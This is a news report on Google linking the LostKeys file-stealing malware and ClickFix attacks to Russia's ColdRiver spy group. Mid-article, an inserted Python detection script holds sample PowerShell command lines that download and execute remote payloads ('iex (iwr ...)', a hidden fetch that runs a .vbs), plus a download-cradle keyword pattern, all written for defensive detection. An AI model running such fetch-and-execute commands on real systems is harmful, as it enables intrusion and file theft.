Google ties LostKeys malware to Russian Spies

Since the beginning of the year, the Russia-backed ColdRiver hacking group has been deploying new LostKeys malware in espionage campaigns targeting Western governments, journalists, think tanks, and non-governmental organizations.

In December 2023, the United Kingdom and its Five Eyes allies linked ColdRiver to Russia's Federal Security Service (FSB), the nation's internal security and counterintelligence agency.

The Google Threat Intelligence Group (GTIG) first observed LostKeys in January, when it was deployed in targeted ClickFix social engineering attacks. In these attacks, the threat actors trick victims into running a malicious PowerShell script themselves. That script downloads and executes additional PowerShell payloads on the compromised system, culminating in the deployment of LostKeys, a Visual Basic Script (VBS) malware used to steal files.

"LOSTKEYS is designed to steal files with specific extensions and from specific directories, while also collecting system information and active processes to send back to the attacker," said GTIG. 

"COLDRIVER typically steals credentials and uses them to steal emails and contacts from the target. However, they may also deploy malware like SPICA when they wish to access specific documents on a target system. LOSTKEYS has a similar purpose and is deployed only in selective cases," GTIG added. 
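The chain described above (user-launched PowerShell with a download cradle, a second-stage PowerShell payload, then a script host running a VBS file) leaves a recognisable parent-child process pattern in endpoint telemetry. The following is an added detection example, not code from the article or from Google; it walks constructed, simplified Sysmon-style process-creation events (the hostnames, PIDs, paths and example.invalid URLs are assumptions for illustration) and raises an alert when PowerShell is spawned from explorer.exe with a download cradle, escalating severity if a descendant wscript.exe or cscript.exe executes a .vbs file:

```python
"""Detect a ClickFix-style chain in process-creation events:
explorer.exe -> powershell (download cradle) -> powershell -> wscript/cscript running a .vbs.
Added illustration; the event layout and sample values below are constructed, not real telemetry.
"""
import re
from collections import defaultdict

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events (simplified Sysmon Event ID 1 fields). Hostnames, PIDs,
# paths and URLs are assumptions chosen to exercise the detection logic.
SAMPLE_EVENTS = [
    {"host": "WS01", "pid": 4100, "ppid": 1200, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"host": "WS01", "pid": 4200, "ppid": 4100, "image": PS,
     "cmdline": 'powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/s1 -UseBasicParsing)"'},
    {"host": "WS01", "pid": 4300, "ppid": 4200, "image": PS,
     "cmdline": 'powershell -nop -w hidden -c "iwr https://example.invalid/s2 -OutFile $env:TEMP\\u.vbs; wscript $env:TEMP\\u.vbs"'},
    {"host": "WS01", "pid": 4400, "ppid": 4300, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript C:\Users\user\AppData\Local\Temp\u.vbs"},
    # Benign control: an interactive one-liner launched from Explorer on another host.
    {"host": "WS02", "pid": 5100, "ppid": 1300, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"host": "WS02", "pid": 5200, "ppid": 5100, "image": PS, "cmdline": "powershell Get-Process"},
]

USER_SHELLS = {"explorer.exe"}               # Run dialog and desktop launches show explorer.exe as parent
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Common ways a one-liner fetches or decodes a remote payload.
DOWNLOAD_CRADLE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|invoke-expression|\biex\b|frombase64string|-enc\w*\s",
    re.I)
# Flags that hide the window or bypass policy; present in many ClickFix one-liners but not decisive alone.
EVASION = re.compile(r"-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass|-nop\b", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def descendants(children, host, pid):
    """Yield every descendant event of (host, pid), depth-first."""
    stack = list(children.get((host, pid), []))
    while stack:
        e = stack.pop()
        yield e
        stack.extend(children.get((host, e["pid"]), []))


def find_clickfix_chains(events):
    """Return one alert per user-launched PowerShell process that pulls remote content."""
    by_pid = {(e["host"], e["pid"]): e for e in events}
    children = defaultdict(list)
    for e in events:
        children[(e["host"], e["ppid"])].append(e)

    alerts = []
    for e in events:
        if basename(e["image"]) not in POWERSHELL:
            continue
        parent = by_pid.get((e["host"], e["ppid"]))
        if parent is None or basename(parent["image"]) not in USER_SHELLS:
            continue
        if not DOWNLOAD_CRADLE.search(e["cmdline"]):
            continue
        # Candidate root: PowerShell started by the user's shell and fetching remote content.
        tree = list(descendants(children, e["host"], e["pid"]))
        vbs_hosts = [d for d in tree
                     if basename(d["image"]) in SCRIPT_HOSTS and ".vbs" in d["cmdline"].lower()]
        if vbs_hosts:
            severity = "high"        # full chain down to a VBS payload, as in the LostKeys case
        elif EVASION.search(e["cmdline"]):
            severity = "medium"      # cradle plus hidden/bypass flags, no script host seen yet
        else:
            severity = "low"
        alerts.append({
            "host": e["host"],
            "root_pid": e["pid"],
            "chain": [e["pid"]] + [d["pid"] for d in tree],
            "vbs_host_pids": [d["pid"] for d in vbs_hosts],
            "severity": severity,
        })
    return alerts


if __name__ == "__main__":
    for alert in find_clickfix_chains(SAMPLE_EVENTS):
        print(alert)
```

Keying on the parent process is what separates this from a generic "PowerShell with a download cradle" rule: a user pasting a one-liner into the Run dialog produces explorer.exe as the parent, whereas scheduled tasks, management agents and legitimate installers do not. Tune USER_SHELLS to the launchers seen in your environment (a browser or terminal as parent is also worth a look), and expect a low-severity hit from any administrator who runs an ad hoc download from Explorer.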

ColdRiver is not alone in using ClickFix: other state-backed groups, including Kimsuky (North Korea), MuddyWater (Iran), and APT28 and UNK_RemoteRogue (Russia), have employed the same technique in recent espionage operations. Also known as Star Blizzard, Callisto Group, and Seaborgium, ColdRiver has used social engineering and open-source intelligence (OSINT) to identify and target victims since at least 2017.

In December 2023, Five Eyes cyber agencies issued warnings about ColdRiver’s spear-phishing campaigns targeting defense, government organizations, NGOs, and political figures. These attacks, which escalated after Russia's invasion of Ukraine, also expanded to include defense-industrial targets and U.S. Department of Energy facilities. 

In 2022, the Microsoft Threat Intelligence Center (MSTIC) disrupted another ColdRiver social engineering operation, in which the hackers used Microsoft accounts to harvest emails and track the activities of organizations and individuals in NATO countries.

In December 2023, the U.S. State Department sanctioned two ColdRiver operators (including one FSB officer), who were also indicted by the U.S. Justice Department for their involvement in a global hacking campaign coordinated by the Russian government.

The State Department is now offering rewards of up to $10 million for information that could assist law enforcement in locating or identifying other ColdRiver members. 
